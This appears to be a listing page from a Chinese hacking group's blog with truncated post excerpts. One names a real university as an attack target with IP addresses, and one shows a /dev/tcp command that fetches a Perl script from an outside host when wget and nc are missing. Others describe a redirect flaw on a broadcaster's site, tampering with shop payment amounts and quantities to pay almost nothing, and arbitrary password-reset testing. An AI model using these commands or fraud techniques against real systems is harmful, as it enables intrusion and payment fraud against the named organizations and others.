0x4edf

14X security organization


友情目标:四川师范大学文理学院未深入.简单玩玩===================================、规则:静态。。jsp二级域名下有很多动态~~125.71.200.234http://125.71.200.244/ConfigWeb%5CIndex.aspxGUID应包含带4个短划线的32...

Linux渗透爱好者的小技巧

2016年03月28日 - 网络安全 - 582 - 0
Linux渗透爱好者的小技巧1.无wgetnc等下载工具时下载文件exec5<>/dev/tcp/yese.yi.org/80&&echo-e"GET/c.plHTTP/1.0\n">&5&&cat<&5&...

GET传送漏洞案例分析(CCTV为例)GET真的安全吗?原理你要在硕大的CCTV去找1个传送漏洞貌似很难不过我们就来想下我们就来爬下::/cntv:passwd爬到了一位:http://jishi.cntv.cn/program/gugong100/01/index.shtml?usrid2011=a61911%40g...

商城支付漏洞三种方法

2016年03月28日 - 网络安全 - 600 - 0
商城支付漏洞三种方法商城支付漏洞三种方法1,订单数,修改为负数-1看看返回2,提交订单时,抓取数据包,把当前金额改成0.1元,然后提交3,大面积购买数量如100个数量,提交时抓取数据包,把数量改为100个配合0.1元思路,实际上你只购买了1个手机,但你缺提交了100个手机,而支付金额0.1...

14X security team

2016年03月28日 - 核心成员 - 672 - 0
14Xsecurityteam核心成员:MXI4oy                      ...

任意密码重置科普篇

2016年03月28日 - 网络安全 - 647 - 0
任意密码重置科普篇我们就拿https://www.xbankd.com作为例子来讲一般来说,任意密码重置,首先是13888888888所谓的土豪金账号测试然后,我们注册一个用户,观察验证方式https://www.xbankd.com/password/verifyusername.html比如忘记密码功能我们随便定...